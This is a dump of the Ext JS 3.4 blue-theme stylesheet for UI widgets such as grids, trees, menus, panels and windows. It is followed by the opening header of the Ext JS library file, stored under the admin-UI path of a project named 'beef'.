.x-btn-over .x-btn-mc em.x-btn-split, .x-btn-click .x-btn-mc em.x-btn-split, .x-btn-menu-active .x-btn-mc em.x-btn-split, .x-btn-pressed .x-btn-mc em.x-btn-split {
background-image:url(../images/default/button/s-arrow-o.gif);
}
.x-btn-mc em.x-btn-arrow-bottom {
background-image:url(../images/default/button/s-arrow-b-noline.gif);
}
.x-btn-mc em.x-btn-split-bottom {
background-image:url(../images/default/button/s-arrow-b.gif);
}
.x-btn-over .x-btn-mc em.x-btn-split-bottom, .x-btn-click .x-btn-mc em.x-btn-split-bottom, .x-btn-menu-active .x-btn-mc em.x-btn-split-bottom, .x-btn-pressed .x-btn-mc em.x-btn-split-bottom {
background-image:url(../images/default/button/s-arrow-bo.gif);
}
.x-btn-group-header {
color: #3e6aaa;
}
.x-btn-group-tc {
background-image: url(../images/default/button/group-tb.gif);
}
.x-btn-group-tl {
background-image: url(../images/default/button/group-cs.gif);
}
.x-btn-group-tr {
background-image: url(../images/default/button/group-cs.gif);
}
.x-btn-group-bc {
background-image: url(../images/default/button/group-tb.gif);
}
.x-btn-group-bl {
background-image: url(../images/default/button/group-cs.gif);
}
.x-btn-group-br {
background-image: url(../images/default/button/group-cs.gif);
}
.x-btn-group-ml {
background-image: url(../images/default/button/group-lr.gif);
}
.x-btn-group-mr {
background-image: url(../images/default/button/group-lr.gif);
}
.x-btn-group-notitle .x-btn-group-tc {
background-image: url(../images/default/button/group-tb.gif);
}.x-toolbar{
border-color:#a9bfd3;
background-color:#d0def0;
background-image:url(../images/default/toolbar/bg.gif);
}
.x-toolbar td,.x-toolbar span,.x-toolbar input,.x-toolbar div,.x-toolbar select,.x-toolbar label{
font:normal 11px arial,tahoma, helvetica, sans-serif;
}
.x-toolbar .x-item-disabled {
color:gray;
}
.x-toolbar .x-item-disabled * {
color:gray;
}
.x-toolbar .x-btn-mc em.x-btn-split {
background-image:url(../images/default/button/s-arrow-noline.gif);
}
.x-toolbar .x-btn-over .x-btn-mc em.x-btn-split, .x-toolbar .x-btn-click .x-btn-mc em.x-btn-split,
.x-toolbar .x-btn-menu-active .x-btn-mc em.x-btn-split, .x-toolbar .x-btn-pressed .x-btn-mc em.x-btn-split
{
background-image:url(../images/default/button/s-arrow-o.gif);
}
.x-toolbar .x-btn-mc em.x-btn-split-bottom {
background-image:url(../images/default/button/s-arrow-b-noline.gif);
}
.x-toolbar .x-btn-over .x-btn-mc em.x-btn-split-bottom, .x-toolbar .x-btn-click .x-btn-mc em.x-btn-split-bottom,
.x-toolbar .x-btn-menu-active .x-btn-mc em.x-btn-split-bottom, .x-toolbar .x-btn-pressed .x-btn-mc em.x-btn-split-bottom
{
background-image:url(../images/default/button/s-arrow-bo.gif);
}
.x-toolbar .xtb-sep {
background-image: url(../images/default/grid/grid-blue-split.gif);
}
.x-tbar-page-first{
background-image: url(../images/default/grid/page-first.gif) !important;
}
.x-tbar-loading{
background-image: url(../images/default/grid/refresh.gif) !important;
}
.x-tbar-page-last{
background-image: url(../images/default/grid/page-last.gif) !important;
}
.x-tbar-page-next{
background-image: url(../images/default/grid/page-next.gif) !important;
}
.x-tbar-page-prev{
background-image: url(../images/default/grid/page-prev.gif) !important;
}
.x-item-disabled .x-tbar-loading{
background-image: url(../images/default/grid/refresh-disabled.gif) !important;
}
.x-item-disabled .x-tbar-page-first{
background-image: url(../images/default/grid/page-first-disabled.gif) !important;
}
.x-item-disabled .x-tbar-page-last{
background-image: url(../images/default/grid/page-last-disabled.gif) !important;
}
.x-item-disabled .x-tbar-page-next{
background-image: url(../images/default/grid/page-next-disabled.gif) !important;
}
.x-item-disabled .x-tbar-page-prev{
background-image: url(../images/default/grid/page-prev-disabled.gif) !important;
}
.x-paging-info {
color:#444;
}
.x-toolbar-more-icon {
background-image: url(../images/default/toolbar/more.gif) !important;
}.x-resizable-handle {
background-color:#fff;
}
.x-resizable-over .x-resizable-handle-east, .x-resizable-pinned .x-resizable-handle-east,
.x-resizable-over .x-resizable-handle-west, .x-resizable-pinned .x-resizable-handle-west
{
background-image:url(../images/default/sizer/e-handle.gif);
}
.x-resizable-over .x-resizable-handle-south, .x-resizable-pinned .x-resizable-handle-south,
.x-resizable-over .x-resizable-handle-north, .x-resizable-pinned .x-resizable-handle-north
{
background-image:url(../images/default/sizer/s-handle.gif);
}
.x-resizable-over .x-resizable-handle-north, .x-resizable-pinned .x-resizable-handle-north{
background-image:url(../images/default/sizer/s-handle.gif);
}
.x-resizable-over .x-resizable-handle-southeast, .x-resizable-pinned .x-resizable-handle-southeast{
background-image:url(../images/default/sizer/se-handle.gif);
}
.x-resizable-over .x-resizable-handle-northwest, .x-resizable-pinned .x-resizable-handle-northwest{
background-image:url(../images/default/sizer/nw-handle.gif);
}
.x-resizable-over .x-resizable-handle-northeast, .x-resizable-pinned .x-resizable-handle-northeast{
background-image:url(../images/default/sizer/ne-handle.gif);
}
.x-resizable-over .x-resizable-handle-southwest, .x-resizable-pinned .x-resizable-handle-southwest{
background-image:url(../images/default/sizer/sw-handle.gif);
}
.x-resizable-proxy{
border-color:#3b5a82;
}
.x-resizable-overlay{
background-color:#fff;
}
.x-grid3 {
background-color:#fff;
}
.x-grid-panel .x-panel-mc .x-panel-body {
border-color:#99bbe8;
}
.x-grid3-row td, .x-grid3-summary-row td{
font:normal 11px/13px arial, tahoma, helvetica, sans-serif;
}
.x-grid3-hd-row td {
font:normal 11px/15px arial, tahoma, helvetica, sans-serif;
}
.x-grid3-hd-row td {
border-left-color:#eee;
border-right-color:#d0d0d0;
}
.x-grid-row-loading {
background-color: #fff;
background-image:url(../images/default/shared/loading-balls.gif);
}
.x-grid3-row {
border-color:#ededed;
border-top-color:#fff;
}
.x-grid3-row-alt{
background-color:#fafafa;
}
.x-grid3-row-over {
border-color:#ddd;
background-color:#efefef;
background-image:url(../images/default/grid/row-over.gif);
}
.x-grid3-resize-proxy {
background-color:#777;
}
.x-grid3-resize-marker {
background-color:#777;
}
.x-grid3-header{
background-color:#f9f9f9;
background-image:url(../images/default/grid/grid3-hrow.gif);
}
.x-grid3-header-pop {
border-left-color:#d0d0d0;
}
.x-grid3-header-pop-inner {
border-left-color:#eee;
background-image:url(../images/default/grid/hd-pop.gif);
}
td.x-grid3-hd-over, td.sort-desc, td.sort-asc, td.x-grid3-hd-menu-open {
border-left-color:#aaccf6;
border-right-color:#aaccf6;
}
td.x-grid3-hd-over .x-grid3-hd-inner, td.sort-desc .x-grid3-hd-inner, td.sort-asc .x-grid3-hd-inner, td.x-grid3-hd-menu-open .x-grid3-hd-inner {
background-color:#ebf3fd;
background-image:url(../images/default/grid/grid3-hrow-over.gif);
}
.sort-asc .x-grid3-sort-icon {
background-image: url(../images/default/grid/sort_asc.gif);
}
.sort-desc .x-grid3-sort-icon {
background-image: url(../images/default/grid/sort_desc.gif);
}
.x-grid3-cell-text, .x-grid3-hd-text {
color:#000;
}
.x-grid3-split {
background-image: url(../images/default/grid/grid-split.gif);
}
.x-grid3-hd-text {
color:#15428b;
}
.x-dd-drag-proxy .x-grid3-hd-inner{
background-color:#ebf3fd;
background-image:url(../images/default/grid/grid3-hrow-over.gif);
border-color:#aaccf6;
}
.col-move-top{
background-image:url(../images/default/grid/col-move-top.gif);
}
.col-move-bottom{
background-image:url(../images/default/grid/col-move-bottom.gif);
}
td.grid-hd-group-cell {
background: url(../images/default/grid/grid3-hrow.gif) repeat-x bottom;
}
.x-grid3-row-selected {
background-color: #dfe8f6 !important;
background-image: none;
border-color:#a3bae9;
}
.x-grid3-cell-selected{
background-color: #b8cfee !important;
color:#000;
}
.x-grid3-cell-selected span{
color:#000 !important;
}
.x-grid3-cell-selected .x-grid3-cell-text{
color:#000;
}
.x-grid3-locked td.x-grid3-row-marker, .x-grid3-locked .x-grid3-row-selected td.x-grid3-row-marker{
background-color:#ebeadb !important;
background-image:url(../images/default/grid/grid-hrow.gif) !important;
color:#000;
border-top-color:#fff;
border-right-color:#6fa0df !important;
}
.x-grid3-locked td.x-grid3-row-marker div, .x-grid3-locked .x-grid3-row-selected td.x-grid3-row-marker div{
color:#15428b !important;
}
.x-grid3-dirty-cell {
background-image:url(../images/default/grid/dirty.gif);
}
.x-grid3-topbar, .x-grid3-bottombar{
font:normal 11px arial, tahoma, helvetica, sans-serif;
}
.x-grid3-bottombar .x-toolbar{
border-top-color:#a9bfd3;
}
.x-props-grid .x-grid3-td-name .x-grid3-cell-inner{
background-image:url(../images/default/grid/grid3-special-col-bg.gif) !important;
color:#000 !important;
}
.x-props-grid .x-grid3-body .x-grid3-td-name{
background-color:#fff !important;
border-right-color:#eee;
}
.xg-hmenu-sort-asc .x-menu-item-icon{
background-image: url(../images/default/grid/hmenu-asc.gif);
}
.xg-hmenu-sort-desc .x-menu-item-icon{
background-image: url(../images/default/grid/hmenu-desc.gif);
}
.xg-hmenu-lock .x-menu-item-icon{
background-image: url(../images/default/grid/hmenu-lock.gif);
}
.xg-hmenu-unlock .x-menu-item-icon{
background-image: url(../images/default/grid/hmenu-unlock.gif);
}
.x-grid3-hd-btn {
background-color:#c3daf9;
background-image:url(../images/default/grid/grid3-hd-btn.gif);
}
.x-grid3-body .x-grid3-td-expander {
background-image:url(../images/default/grid/grid3-special-col-bg.gif);
}
.x-grid3-row-expander {
background-image:url(../images/default/grid/row-expand-sprite.gif);
}
.x-grid3-body .x-grid3-td-checker {
background-image: url(../images/default/grid/grid3-special-col-bg.gif);
}
.x-grid3-row-checker, .x-grid3-hd-checker {
background-image:url(../images/default/grid/row-check-sprite.gif);
}
.x-grid3-body .x-grid3-td-numberer {
background-image:url(../images/default/grid/grid3-special-col-bg.gif);
}
.x-grid3-body .x-grid3-td-numberer .x-grid3-cell-inner {
color:#444;
}
.x-grid3-body .x-grid3-td-row-icon {
background-image:url(../images/default/grid/grid3-special-col-bg.gif);
}
.x-grid3-body .x-grid3-row-selected .x-grid3-td-numberer,
.x-grid3-body .x-grid3-row-selected .x-grid3-td-checker,
.x-grid3-body .x-grid3-row-selected .x-grid3-td-expander {
background-image:url(../images/default/grid/grid3-special-col-sel-bg.gif);
}
.x-grid3-check-col {
background-image:url(../images/default/menu/unchecked.gif);
}
.x-grid3-check-col-on {
background-image:url(../images/default/menu/checked.gif);
}
.x-grid-group, .x-grid-group-body, .x-grid-group-hd {
zoom:1;
}
.x-grid-group-hd {
border-bottom-color:#99bbe8;
}
.x-grid-group-hd div.x-grid-group-title {
background-image:url(../images/default/grid/group-collapse.gif);
color:#3764a0;
font:bold 11px tahoma, arial, helvetica, sans-serif;
}
.x-grid-group-collapsed .x-grid-group-hd div.x-grid-group-title {
background-image:url(../images/default/grid/group-expand.gif);
}
.x-group-by-icon {
background-image:url(../images/default/grid/group-by.gif);
}
.x-cols-icon {
background-image:url(../images/default/grid/columns.gif);
}
.x-show-groups-icon {
background-image:url(../images/default/grid/group-by.gif);
}
.x-grid-empty {
color:gray;
font:normal 11px tahoma, arial, helvetica, sans-serif;
}
.x-grid-with-col-lines .x-grid3-row td.x-grid3-cell {
border-right-color:#ededed;
}
.x-grid-with-col-lines .x-grid3-row-selected {
border-top-color:#a3bae9;
}.x-pivotgrid .x-grid3-header-offset table td {
background: url(../images/default/grid/grid3-hrow.gif) repeat-x 50% 100%;
border-left: 1px solid;
border-right: 1px solid;
border-left-color: #EEE;
border-right-color: #D0D0D0;
}
.x-pivotgrid .x-grid3-row-headers {
background-color: #f9f9f9;
}
.x-pivotgrid .x-grid3-row-headers table td {
background: #EEE url(../images/default/grid/grid3-rowheader.gif) repeat-x left top;
border-left: 1px solid;
border-right: 1px solid;
border-left-color: #EEE;
border-right-color: #D0D0D0;
border-bottom: 1px solid;
border-bottom-color: #D0D0D0;
height: 18px;
}
.x-dd-drag-ghost{
color:#000;
font: normal 11px arial, helvetica, sans-serif;
border-color: #ddd #bbb #bbb #ddd;
background-color:#fff;
}
.x-dd-drop-nodrop .x-dd-drop-icon{
background-image: url(../images/default/dd/drop-no.gif);
}
.x-dd-drop-ok .x-dd-drop-icon{
background-image: url(../images/default/dd/drop-yes.gif);
}
.x-dd-drop-ok-add .x-dd-drop-icon{
background-image: url(../images/default/dd/drop-add.gif);
}
.x-view-selector {
background-color:#c3daf9;
border-color:#3399bb;
}.x-tree-node-expanded .x-tree-node-icon{
background-image:url(../images/default/tree/folder-open.gif);
}
.x-tree-node-leaf .x-tree-node-icon{
background-image:url(../images/default/tree/folder.gif);
}
.x-tree-node-collapsed .x-tree-node-icon{
background-image:url(../images/default/tree/folder.gif);
}
.x-tree-node-loading .x-tree-node-icon{
background-image:url(../images/default/tree/loading.gif) !important;
}
.x-tree-node .x-tree-node-inline-icon {
background-image: none;
}
.x-tree-node-loading a span{
font-style: italic;
color:#444444;
}
.x-tree-lines .x-tree-elbow{
background-image:url(../images/default/tree/elbow.gif);
}
.x-tree-lines .x-tree-elbow-plus{
background-image:url(../images/default/tree/elbow-plus.gif);
}
.x-tree-lines .x-tree-elbow-minus{
background-image:url(../images/default/tree/elbow-minus.gif);
}
.x-tree-lines .x-tree-elbow-end{
background-image:url(../images/default/tree/elbow-end.gif);
}
.x-tree-lines .x-tree-elbow-end-plus{
background-image:url(../images/default/tree/elbow-end-plus.gif);
}
.x-tree-lines .x-tree-elbow-end-minus{
background-image:url(../images/default/tree/elbow-end-minus.gif);
}
.x-tree-lines .x-tree-elbow-line{
background-image:url(../images/default/tree/elbow-line.gif);
}
.x-tree-no-lines .x-tree-elbow-plus{
background-image:url(../images/default/tree/elbow-plus-nl.gif);
}
.x-tree-no-lines .x-tree-elbow-minus{
background-image:url(../images/default/tree/elbow-minus-nl.gif);
}
.x-tree-no-lines .x-tree-elbow-end-plus{
background-image:url(../images/default/tree/elbow-end-plus-nl.gif);
}
.x-tree-no-lines .x-tree-elbow-end-minus{
background-image:url(../images/default/tree/elbow-end-minus-nl.gif);
}
.x-tree-arrows .x-tree-elbow-plus{
background-image:url(../images/default/tree/arrows.gif);
}
.x-tree-arrows .x-tree-elbow-minus{
background-image:url(../images/default/tree/arrows.gif);
}
.x-tree-arrows .x-tree-elbow-end-plus{
background-image:url(../images/default/tree/arrows.gif);
}
.x-tree-arrows .x-tree-elbow-end-minus{
background-image:url(../images/default/tree/arrows.gif);
}
.x-tree-node{
color:#000;
font: normal 11px arial, tahoma, helvetica, sans-serif;
}
.x-tree-node a, .x-dd-drag-ghost a{
color:#000;
}
.x-tree-node a span, .x-dd-drag-ghost a span{
color:#000;
}
.x-tree-node .x-tree-node-disabled a span{
color:gray !important;
}
.x-tree-node div.x-tree-drag-insert-below{
border-bottom-color:#36c;
}
.x-tree-node div.x-tree-drag-insert-above{
border-top-color:#36c;
}
.x-tree-dd-underline .x-tree-node div.x-tree-drag-insert-below a{
border-bottom-color:#36c;
}
.x-tree-dd-underline .x-tree-node div.x-tree-drag-insert-above a{
border-top-color:#36c;
}
.x-tree-node .x-tree-drag-append a span{
background-color:#ddd;
border-color:gray;
}
.x-tree-node .x-tree-node-over {
background-color: #eee;
}
.x-tree-node .x-tree-selected {
background-color: #d9e8fb;
}
.x-tree-drop-ok-append .x-dd-drop-icon{
background-image: url(../images/default/tree/drop-add.gif);
}
.x-tree-drop-ok-above .x-dd-drop-icon{
background-image: url(../images/default/tree/drop-over.gif);
}
.x-tree-drop-ok-below .x-dd-drop-icon{
background-image: url(../images/default/tree/drop-under.gif);
}
.x-tree-drop-ok-between .x-dd-drop-icon{
background-image: url(../images/default/tree/drop-between.gif);
}.x-date-picker {
border-color: #1b376c;
background-color:#fff;
}
.x-date-middle,.x-date-left,.x-date-right {
background-image: url(../images/default/shared/hd-sprite.gif);
color:#fff;
font:bold 11px "sans serif", tahoma, verdana, helvetica;
}
.x-date-middle .x-btn .x-btn-text {
color:#fff;
}
.x-date-middle .x-btn-mc em.x-btn-arrow {
background-image:url(../images/default/toolbar/btn-arrow-light.gif);
}
.x-date-right a {
background-image: url(../images/default/shared/right-btn.gif);
}
.x-date-left a{
background-image: url(../images/default/shared/left-btn.gif);
}
.x-date-inner th {
background-color:#dfecfb;
background-image:url(../images/default/shared/glass-bg.gif);
border-bottom-color:#a3bad9;
font:normal 10px arial, helvetica,tahoma,sans-serif;
color:#233d6d;
}
.x-date-inner td {
border-color:#fff;
}
.x-date-inner a {
font:normal 11px arial, helvetica,tahoma,sans-serif;
color:#000;
}
.x-date-inner .x-date-active{
color:#000;
}
.x-date-inner .x-date-selected a{
background-color:#dfecfb;
background-image:url(../images/default/shared/glass-bg.gif);
border-color:#8db2e3;
}
.x-date-inner .x-date-today a{
border-color:darkred;
}
.x-date-inner .x-date-selected span{
font-weight:bold;
}
.x-date-inner .x-date-prevday a,.x-date-inner .x-date-nextday a {
color:#aaa;
}
.x-date-bottom {
border-top-color:#a3bad9;
background-color:#dfecfb;
background-image:url(../images/default/shared/glass-bg.gif);
}
.x-date-inner a:hover, .x-date-inner .x-date-disabled a:hover{
color:#000;
background-color:#ddecfe;
}
.x-date-inner .x-date-disabled a {
background-color:#eee;
color:#bbb;
}
.x-date-mmenu{
background-color:#eee !important;
}
.x-date-mmenu .x-menu-item {
font-size:10px;
color:#000;
}
.x-date-mp {
background-color:#fff;
}
.x-date-mp td {
font:normal 11px arial, helvetica,tahoma,sans-serif;
}
.x-date-mp-btns button {
background-color:#083772;
color:#fff;
border-color: #3366cc #000055 #000055 #3366cc;
font:normal 11px arial, helvetica,tahoma,sans-serif;
}
.x-date-mp-btns {
background-color: #dfecfb;
background-image: url(../images/default/shared/glass-bg.gif);
}
.x-date-mp-btns td {
border-top-color: #c5d2df;
}
td.x-date-mp-month a,td.x-date-mp-year a {
color:#15428b;
}
td.x-date-mp-month a:hover,td.x-date-mp-year a:hover {
color:#15428b;
background-color: #ddecfe;
}
td.x-date-mp-sel a {
background-color: #dfecfb;
background-image: url(../images/default/shared/glass-bg.gif);
border-color:#8db2e3;
}
.x-date-mp-ybtn a {
background-image:url(../images/default/panel/tool-sprites.gif);
}
td.x-date-mp-sep {
border-right-color:#c5d2df;
}.x-tip .x-tip-close{
background-image: url(../images/default/qtip/close.gif);
}
.x-tip .x-tip-tc, .x-tip .x-tip-tl, .x-tip .x-tip-tr, .x-tip .x-tip-bc, .x-tip .x-tip-bl, .x-tip .x-tip-br, .x-tip .x-tip-ml, .x-tip .x-tip-mr {
background-image: url(../images/default/qtip/tip-sprite.gif);
}
.x-tip .x-tip-mc {
font: normal 11px tahoma,arial,helvetica,sans-serif;
}
.x-tip .x-tip-ml {
background-color: #fff;
}
.x-tip .x-tip-header-text {
font: bold 11px tahoma,arial,helvetica,sans-serif;
color:#444;
}
.x-tip .x-tip-body {
font: normal 11px tahoma,arial,helvetica,sans-serif;
color:#444;
}
.x-form-invalid-tip .x-tip-tc, .x-form-invalid-tip .x-tip-tl, .x-form-invalid-tip .x-tip-tr, .x-form-invalid-tip .x-tip-bc,
.x-form-invalid-tip .x-tip-bl, .x-form-invalid-tip .x-tip-br, .x-form-invalid-tip .x-tip-ml, .x-form-invalid-tip .x-tip-mr
{
background-image: url(../images/default/form/error-tip-corners.gif);
}
.x-form-invalid-tip .x-tip-body {
background-image:url(../images/default/form/exclamation.gif);
}
.x-tip-anchor {
background-image:url(../images/default/qtip/tip-anchor-sprite.gif);
}.x-menu {
background-color:#f0f0f0;
background-image:url(../images/default/menu/menu.gif);
}
.x-menu-floating{
border-color:#718bb7;
}
.x-menu-nosep {
background-image:none;
}
.x-menu-list-item{
font:normal 11px arial,tahoma,sans-serif;
}
.x-menu-item-arrow{
background-image:url(../images/default/menu/menu-parent.gif);
}
.x-menu-sep {
background-color:#e0e0e0;
border-bottom-color:#fff;
}
a.x-menu-item {
color:#222;
}
.x-menu-item-active {
background-image: url(../images/default/menu/item-over.gif);
background-color: #dbecf4;
border-color:#aaccf6;
}
.x-menu-item-active a.x-menu-item {
border-color:#aaccf6;
}
.x-menu-check-item .x-menu-item-icon{
background-image:url(../images/default/menu/unchecked.gif);
}
.x-menu-item-checked .x-menu-item-icon{
background-image:url(../images/default/menu/checked.gif);
}
.x-menu-item-checked .x-menu-group-item .x-menu-item-icon{
background-image:url(../images/default/menu/group-checked.gif);
}
.x-menu-group-item .x-menu-item-icon{
background-image:none;
}
.x-menu-plain {
background-color:#f0f0f0 !important;
background-image: none;
}
.x-date-menu, .x-color-menu{
background-color: #fff !important;
}
.x-menu .x-date-picker{
border-color:#a3bad9;
}
.x-cycle-menu .x-menu-item-checked {
border-color:#a3bae9 !important;
background-color:#def8f6;
}
.x-menu-scroller-top {
background-image:url(../images/default/layout/mini-top.gif);
}
.x-menu-scroller-bottom {
background-image:url(../images/default/layout/mini-bottom.gif);
}
.x-box-tl {
background-image: url(../images/default/box/corners.gif);
}
.x-box-tc {
background-image: url(../images/default/box/tb.gif);
}
.x-box-tr {
background-image: url(../images/default/box/corners.gif);
}
.x-box-ml {
background-image: url(../images/default/box/l.gif);
}
.x-box-mc {
background-color: #eee;
background-image: url(../images/default/box/tb.gif);
font-family: "Myriad Pro","Myriad Web","Tahoma","Helvetica","Arial",sans-serif;
color: #393939;
font-size: 12px;
}
.x-box-mc h3 {
font-size: 14px;
font-weight: bold;
}
.x-box-mr {
background-image: url(../images/default/box/r.gif);
}
.x-box-bl {
background-image: url(../images/default/box/corners.gif);
}
.x-box-bc {
background-image: url(../images/default/box/tb.gif);
}
.x-box-br {
background-image: url(../images/default/box/corners.gif);
}
.x-box-blue .x-box-bl, .x-box-blue .x-box-br, .x-box-blue .x-box-tl, .x-box-blue .x-box-tr {
background-image: url(../images/default/box/corners-blue.gif);
}
.x-box-blue .x-box-bc, .x-box-blue .x-box-mc, .x-box-blue .x-box-tc {
background-image: url(../images/default/box/tb-blue.gif);
}
.x-box-blue .x-box-mc {
background-color: #c3daf9;
}
.x-box-blue .x-box-mc h3 {
color: #17385b;
}
.x-box-blue .x-box-ml {
background-image: url(../images/default/box/l-blue.gif);
}
.x-box-blue .x-box-mr {
background-image: url(../images/default/box/r-blue.gif);
}.x-combo-list {
border-color:#98c0f4;
background-color:#ddecfe;
font:normal 12px tahoma, arial, helvetica, sans-serif;
}
.x-combo-list-inner {
background-color:#fff;
}
.x-combo-list-hd {
font:bold 11px tahoma, arial, helvetica, sans-serif;
color:#15428b;
background-image: url(../images/default/layout/panel-title-light-bg.gif);
border-bottom-color:#98c0f4;
}
.x-resizable-pinned .x-combo-list-inner {
border-bottom-color:#98c0f4;
}
.x-combo-list-item {
border-color:#fff;
}
.x-combo-list .x-combo-selected{
border-color:#a3bae9 !important;
background-color:#dfe8f6;
}
.x-combo-list .x-toolbar {
border-top-color:#98c0f4;
}
.x-combo-list-small {
font:normal 11px tahoma, arial, helvetica, sans-serif;
}.x-panel {
border-color: #99bbe8;
}
.x-panel-header {
color:#15428b;
font-weight:bold;
font-size: 11px;
font-family: tahoma,arial,verdana,sans-serif;
border-color:#99bbe8;
background-image: url(../images/default/panel/white-top-bottom.gif);
}
.x-panel-body {
border-color:#99bbe8;
background-color:#fff;
}
.x-panel-bbar .x-toolbar, .x-panel-tbar .x-toolbar {
border-color:#99bbe8;
}
.x-panel-tbar-noheader .x-toolbar, .x-panel-mc .x-panel-tbar .x-toolbar {
border-top-color:#99bbe8;
}
.x-panel-body-noheader, .x-panel-mc .x-panel-body {
border-top-color:#99bbe8;
}
.x-panel-tl .x-panel-header {
color:#15428b;
font:bold 11px tahoma,arial,verdana,sans-serif;
}
.x-panel-tc {
background-image: url(../images/default/panel/top-bottom.gif);
}
.x-panel-tl, .x-panel-tr, .x-panel-bl, .x-panel-br{
background-image: url(../images/default/panel/corners-sprite.gif);
border-bottom-color:#99bbe8;
}
.x-panel-bc {
background-image: url(../images/default/panel/top-bottom.gif);
}
.x-panel-mc {
font: normal 11px tahoma,arial,helvetica,sans-serif;
background-color:#dfe8f6;
}
.x-panel-ml {
background-color: #fff;
background-image:url(../images/default/panel/left-right.gif);
}
.x-panel-mr {
background-image: url(../images/default/panel/left-right.gif);
}
.x-tool {
background-image:url(../images/default/panel/tool-sprites.gif);
}
.x-panel-ghost {
background-color:#cbddf3;
}
.x-panel-ghost ul {
border-color:#99bbe8;
}
.x-panel-dd-spacer {
border-color:#99bbe8;
}
.x-panel-fbar td,.x-panel-fbar span,.x-panel-fbar input,.x-panel-fbar div,.x-panel-fbar select,.x-panel-fbar label{
font:normal 11px arial,tahoma, helvetica, sans-serif;
}
.x-window-proxy {
background-color:#c7dffc;
border-color:#99bbe8;
}
.x-window-tl .x-window-header {
color:#15428b;
font:bold 11px tahoma,arial,verdana,sans-serif;
}
.x-window-tc {
background-image: url(../images/default/window/top-bottom.png);
}
.x-window-tl {
background-image: url(../images/default/window/left-corners.png);
}
.x-window-tr {
background-image: url(../images/default/window/right-corners.png);
}
.x-window-bc {
background-image: url(../images/default/window/top-bottom.png);
}
.x-window-bl {
background-image: url(../images/default/window/left-corners.png);
}
.x-window-br {
background-image: url(../images/default/window/right-corners.png);
}
.x-window-mc {
border-color:#99bbe8;
font: normal 11px tahoma,arial,helvetica,sans-serif;
background-color:#dfe8f6;
}
.x-window-ml {
background-image: url(../images/default/window/left-right.png);
}
.x-window-mr {
background-image: url(../images/default/window/left-right.png);
}
.x-window-maximized .x-window-tc {
background-color:#fff;
}
.x-window-bbar .x-toolbar {
border-top-color:#99bbe8;
}
.x-panel-ghost .x-window-tl {
border-bottom-color:#99bbe8;
}
.x-panel-collapsed .x-window-tl {
border-bottom-color:#84a0c4;
}
.x-dlg-mask{
background-color:#ccc;
}
.x-window-plain .x-window-mc {
background-color: #ccd9e8;
border-color: #a3bae9 #dfe8f6 #dfe8f6 #a3bae9;
}
.x-window-plain .x-window-body {
border-color: #dfe8f6 #a3bae9 #a3bae9 #dfe8f6;
}
body.x-body-masked .x-window-plain .x-window-mc {
background-color: #ccd9e8;
}.x-html-editor-wrap {
border-color:#a9bfd3;
background-color:#fff;
}
.x-html-editor-tb .x-btn-text {
background-image:url(../images/default/editor/tb-sprite.gif);
}.x-panel-noborder .x-panel-header-noborder {
border-bottom-color:#99bbe8;
}
.x-panel-noborder .x-panel-tbar-noborder .x-toolbar {
border-bottom-color:#99bbe8;
}
.x-panel-noborder .x-panel-bbar-noborder .x-toolbar {
border-top-color:#99bbe8;
}
.x-tab-panel-bbar-noborder .x-toolbar {
border-top-color:#99bbe8;
}
.x-tab-panel-tbar-noborder .x-toolbar {
border-bottom-color:#99bbe8;
}.x-border-layout-ct {
background-color:#dfe8f6;
}
.x-accordion-hd {
color:#222;
font-weight:normal;
background-image: url(../images/default/panel/light-hd.gif);
}
.x-layout-collapsed{
background-color:#d2e0f2;
border-color:#98c0f4;
}
.x-layout-collapsed-over{
background-color:#d9e8fb;
}
.x-layout-split-west .x-layout-mini {
background-image:url(../images/default/layout/mini-left.gif);
}
.x-layout-split-east .x-layout-mini {
background-image:url(../images/default/layout/mini-right.gif);
}
.x-layout-split-north .x-layout-mini {
background-image:url(../images/default/layout/mini-top.gif);
}
.x-layout-split-south .x-layout-mini {
background-image:url(../images/default/layout/mini-bottom.gif);
}
.x-layout-cmini-west .x-layout-mini {
background-image:url(../images/default/layout/mini-right.gif);
}
.x-layout-cmini-east .x-layout-mini {
background-image:url(../images/default/layout/mini-left.gif);
}
.x-layout-cmini-north .x-layout-mini {
background-image:url(../images/default/layout/mini-bottom.gif);
}
.x-layout-cmini-south .x-layout-mini {
background-image:url(../images/default/layout/mini-top.gif);
}.x-progress-wrap {
border-color:#6593cf;
}
.x-progress-inner {
background-color:#e0e8f3;
background-image:url(../images/default/qtip/bg.gif);
}
.x-progress-bar {
background-color:#9cbfee;
background-image:url(../images/default/progress/progress-bg.gif);
border-top-color:#d1e4fd;
border-bottom-color:#7fa9e4;
border-right-color:#7fa9e4;
}
.x-progress-text {
font-size:11px;
font-weight:bold;
color:#fff;
}
.x-progress-text-back {
color:#396095;
}.x-list-header{
background-color:#f9f9f9;
background-image:url(../images/default/grid/grid3-hrow.gif);
}
.x-list-header-inner div em {
border-left-color:#ddd;
font:normal 11px arial, tahoma, helvetica, sans-serif;
}
.x-list-body dt em {
font:normal 11px arial, tahoma, helvetica, sans-serif;
}
.x-list-over {
background-color:#eee;
}
.x-list-selected {
background-color:#dfe8f6;
}
.x-list-resizer {
border-left-color:#555;
border-right-color:#555;
}
.x-list-header-inner em.sort-asc, .x-list-header-inner em.sort-desc {
background-image:url(../images/default/grid/sort-hd.gif);
border-color: #99bbe8;
}.x-slider-horz, .x-slider-horz .x-slider-end, .x-slider-horz .x-slider-inner {
background-image:url(../images/default/slider/slider-bg.png);
}
.x-slider-horz .x-slider-thumb {
background-image:url(../images/default/slider/slider-thumb.png);
}
.x-slider-vert, .x-slider-vert .x-slider-end, .x-slider-vert .x-slider-inner {
background-image:url(../images/default/slider/slider-v-bg.png);
}
.x-slider-vert .x-slider-thumb {
background-image:url(../images/default/slider/slider-v-thumb.png);
}.x-window-dlg .ext-mb-text,
.x-window-dlg .x-window-header-text {
font-size:12px;
}
.x-window-dlg .ext-mb-textarea {
font:normal 12px tahoma,arial,helvetica,sans-serif;
}
.x-window-dlg .x-msg-box-wait {
background-image:url(../images/default/grid/loading.gif);
}
.x-window-dlg .ext-mb-info {
background-image:url(../images/default/window/icon-info.gif);
}
.x-window-dlg .ext-mb-warning {
background-image:url(../images/default/window/icon-warning.gif);
}
.x-window-dlg .ext-mb-question {
background-image:url(../images/default/window/icon-question.gif);
}
.x-window-dlg .ext-mb-error {
background-image:url(../images/default/window/icon-error.gif);
} |
|
JavaScript | beef/extensions/admin_ui/media/javascript/ext-all.js | /*
* Ext JS Library 3.4.0
* Copyright(c) 2006-2011 Sencha Inc.
* [email protected]
* http://www.sencha.com/license
*/
(function () {
var h = Ext.util, j = Ext.each, g = true, i = false;
h.Observable = function () {
